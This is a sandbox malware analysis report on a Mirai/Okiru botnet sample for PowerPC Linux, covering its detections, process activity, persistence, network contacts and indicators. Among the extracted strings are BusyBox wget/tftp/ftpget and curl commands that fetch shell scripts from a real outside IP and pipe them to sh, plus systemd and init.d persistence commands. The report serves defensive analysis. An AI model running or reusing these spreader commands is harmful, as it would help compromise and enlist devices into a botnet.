Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
powerpc.nn.elf

Overview

General Information

Sample name:powerpc.nn.elf
Analysis ID:1566175
MD5:74c49e9055c88f47c12159623058575f
SHA1:b77f4dbedb2dd0bc0c8c34b36122f5b70980f845
SHA256:cd19b2a09dd7c27b5f8d4f547570c083f7107e680fed87428fb22c16728a45fe
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1566175
Start date and time:2024-12-01 15:13:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 42s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:powerpc.nn.elf
Detection:MAL
Classification:mal88.spre.troj.evad.linELF@0/8@0/0
  • VT rate limit hit for: powerpc.nn.elf
Command:/tmp/powerpc.nn.elf
PID:6253
Exit Code:137
Exit Code Info:SIGKILL (9) Kill signal
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6227, Parent: 4331)
  • rm (PID: 6227, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.3SQz1FitMD /tmp/tmp.XkEh84dmkk /tmp/tmp.fnBcs5PJpu
  • dash New Fork (PID: 6228, Parent: 4331)
  • rm (PID: 6228, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.3SQz1FitMD /tmp/tmp.XkEh84dmkk /tmp/tmp.fnBcs5PJpu
  • powerpc.nn.elf (PID: 6253, Parent: 6153, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/powerpc.nn.elf
    • sh (PID: 6290, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6297, Parent: 6290)
      • systemctl (PID: 6297, Parent: 6290, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6322, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6328, Parent: 6322)
      • chmod (PID: 6328, Parent: 6322, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6330, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6338, Parent: 6330)
      • ln (PID: 6338, Parent: 6330, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
  • udisksd New Fork (PID: 6265, Parent: 799)
  • dumpe2fs (PID: 6265, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6299, Parent: 799)
  • dumpe2fs (PID: 6299, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • sh (PID: 6300, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6300, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • systemd New Fork (PID: 6306, Parent: 6304)
  • snapd-env-generator (PID: 6306, Parent: 6304, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6340, Parent: 799)
  • dumpe2fs (PID: 6340, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • gdm3 New Fork (PID: 6344, Parent: 1320)
  • Default (PID: 6344, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6368, Parent: 1320)
  • Default (PID: 6368, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • udisksd New Fork (PID: 6370, Parent: 799)
  • dumpe2fs (PID: 6370, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
powerpc.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    powerpc.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6272.1.00007f9438001000.00007f943801b000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6272.1.00007f9438001000.00007f943801b000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6253.1.00007f9438001000.00007f943801b000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            6253.1.00007f9438001000.00007f943801b000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Process Memory Space: powerpc.nn.elf PID: 6253JoeSecurity_OkiruYara detected OkiruJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: powerpc.nn.elfAvira: detected
                Source: powerpc.nn.elfReversingLabs: Detection: 44%
                Source: powerpc.nn.elfString: getinfo xxxTSource Engine Query(deleted)/proc/self/exe/proc/%s/exe/proc/opendirtmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/login
                Source: powerpc.nn.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
                Source: global trafficTCP traffic: 192.168.2.23:38978 -> 154.216.19.139:199
                Source: /tmp/powerpc.nn.elf (PID: 6253)Socket: 0.0.0.0:38242Jump to behavior
                Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: powerpc.nn.elf, system.16.dr, inittab.16.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drString found in binary or memory: http://94.156.227.233/
                Source: powerpc.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
                Source: powerpc.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
                Source: powerpc.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
                Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: getinfo xxxTSource Engine Query(deleted)/proc/self/exe/proc/%s/exe/proc/opendirtmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
                Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/powerpc.nn.elf (PID: 6272)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6272)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6272)SIGKILL sent: pid: 1664, result: successfulJump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6272)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6272)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6272)SIGKILL sent: pid: 6253, result: successfulJump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6272)SIGKILL sent: pid: 6300, result: successfulJump to behavior
                Source: classification engineClassification label: mal88.spre.troj.evad.linELF@0/8@0/0

                Persistence and Installation Behavior

                barindex
                Source: /tmp/powerpc.nn.elf (PID: 6253)File: /etc/profileJump to behavior
                Source: /usr/bin/ln (PID: 6338)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
                Source: /usr/bin/chmod (PID: 6328)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6290)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6322)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6330)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
                Source: /bin/sh (PID: 6328)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
                Source: /usr/bin/dash (PID: 6227)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.3SQz1FitMD /tmp/tmp.XkEh84dmkk /tmp/tmp.fnBcs5PJpuJump to behavior
                Source: /usr/bin/dash (PID: 6228)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.3SQz1FitMD /tmp/tmp.XkEh84dmkk /tmp/tmp.fnBcs5PJpuJump to behavior
                Source: /bin/sh (PID: 6297)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
                Source: /usr/bin/chmod (PID: 6328)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/powerpc.nn.elf (PID: 6253)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: /tmp/powerpc.nn.elf (PID: 6253)File: /etc/init.d/systemJump to dropped file
                Source: /tmp/powerpc.nn.elf (PID: 6253)Queries kernel information via 'uname': Jump to behavior
                Source: powerpc.nn.elf, 6253.1.00007ffd01498000.00007ffd014b9000.rw-.sdmpBinary or memory string: /tmp/qemu-open.ABxVL3
                Source: powerpc.nn.elf, 6253.1.000055734ae0d000.000055734aebd000.rw-.sdmp, powerpc.nn.elf, 6272.1.000055734ae0d000.000055734aebd000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1/usr/lib/udisks2/udisksd1/proc/111/exe
                Source: powerpc.nn.elf, 6253.1.00007ffd01498000.00007ffd014b9000.rw-.sdmpBinary or memory string: GsU)DWGsU/tmp/qemu-open.ABxVL3\dX0
                Source: powerpc.nn.elf, 6272.1.000055734ae0d000.000055734aebd000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
                Source: powerpc.nn.elf, 6253.1.000055734ae0d000.000055734aebd000.rw-.sdmp, powerpc.nn.elf, 6272.1.000055734ae0d000.000055734aebd000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
                Source: powerpc.nn.elf, 6253.1.00007ffd01498000.00007ffd014b9000.rw-.sdmp, powerpc.nn.elf, 6272.1.00007ffd01498000.00007ffd014b9000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
                Source: powerpc.nn.elf, 6253.1.00007ffd01498000.00007ffd014b9000.rw-.sdmp, powerpc.nn.elf, 6272.1.00007ffd01498000.00007ffd014b9000.rw-.sdmpBinary or memory string: %s/qemu-op
                Source: powerpc.nn.elf, 6253.1.00007ffd01498000.00007ffd014b9000.rw-.sdmp, powerpc.nn.elf, 6272.1.00007ffd01498000.00007ffd014b9000.rw-.sdmpBinary or memory string: panel/wrapper-2.MPDIR%s/qemu-op
                Source: powerpc.nn.elf, 6253.1.00007ffd01498000.00007ffd014b9000.rw-.sdmp, powerpc.nn.elf, 6272.1.00007ffd01498000.00007ffd014b9000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/powerpc.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/powerpc.nn.elf
                Source: powerpc.nn.elf, 6272.1.000055734ae0d000.000055734aebd000.rw-.sdmpBinary or memory string: JsU/ppc/ro10 /proc/1888/exe0!/usr/bin/vmtoolsd1

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: powerpc.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6272.1.00007f9438001000.00007f943801b000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6253.1.00007f9438001000.00007f943801b000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: powerpc.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6272.1.00007f9438001000.00007f943801b000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6253.1.00007f9438001000.00007f943801b000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powerpc.nn.elf PID: 6253, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powerpc.nn.elf PID: 6272, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: powerpc.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6272.1.00007f9438001000.00007f943801b000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6253.1.00007f9438001000.00007f943801b000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: powerpc.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6272.1.00007f9438001000.00007f943801b000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6253.1.00007f9438001000.00007f943801b000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powerpc.nn.elf PID: 6253, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powerpc.nn.elf PID: 6272, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information2
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Unix Shell Configuration Modification
                1
                Unix Shell Configuration Modification
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network Medium1
                Data Manipulation
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Systemd Service
                1
                Systemd Service
                2
                File and Directory Permissions Modification
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Scripting
                Logon Script (Windows)1
                File Deletion
                Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566175 Sample: powerpc.nn.elf Startdate: 01/12/2024 Architecture: LINUX Score: 88 37 154.216.19.139, 199, 38978, 38980 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 2->37 39 109.202.202.202, 80 INIT7CH Switzerland 2->39 41 3 other IPs or domains 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected Okiru 2->47 49 Yara detected Mirai 2->49 8 dash rm powerpc.nn.elf 2->8         started        12 gnome-session-binary sh gsd-housekeeping 2->12         started        14 udisksd dumpe2fs 2->14         started        16 7 other processes 2->16 signatures3 process4 file5 33 /etc/profile, ASCII 8->33 dropped 35 /etc/init.d/system, POSIX 8->35 dropped 51 Sample tries to persist itself using /etc/profile 8->51 53 Drops files in suspicious directories 8->53 18 powerpc.nn.elf sh 8->18         started        20 powerpc.nn.elf sh 8->20         started        22 powerpc.nn.elf sh 8->22         started        24 powerpc.nn.elf 8->24         started        signatures6 process7 process8 26 sh chmod 18->26         started        29 sh ln 20->29         started        31 sh systemctl 22->31         started        signatures9 55 Sample tries to set files in /etc globally writable 26->55 57 Sample tries to persist itself using System V runlevels 29->57
                SourceDetectionScannerLabelLink
                powerpc.nn.elf45%ReversingLabsLinux.Backdoor.Mirai
                powerpc.nn.elf100%AviraEXP/ELF.Mirai.W
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://94.156.227.233/curl.shpowerpc.nn.elffalse
                  high
                  http://94.156.227.233/lol.shpowerpc.nn.elffalse
                    high
                    http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/spowerpc.nn.elffalse
                      high
                      http://94.156.227.233/powerpc.nn.elf, system.16.dr, inittab.16.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        54.171.230.55
                        unknownUnited States
                        16509AMAZON-02USfalse
                        154.216.19.139
                        unknownSeychelles
                        135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                        109.202.202.202
                        unknownSwitzerland
                        13030INIT7CHfalse
                        91.189.91.43
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        91.189.91.42
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        54.171.230.55arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          snype.ppc.elfGet hashmaliciousGafgytBrowse
                            boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                              boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                  spc.elfGet hashmaliciousUnknownBrowse
                                    sshd.elfGet hashmaliciousUnknownBrowse
                                      m68k.elfGet hashmaliciousUnknownBrowse
                                        ppc.elfGet hashmaliciousUnknownBrowse
                                          hmips.elfGet hashmaliciousUnknownBrowse
                                            154.216.19.139arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                            kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                                              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                              91.189.91.43arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                  botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                    snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                      snype.ppc.elfGet hashmaliciousGafgytBrowse
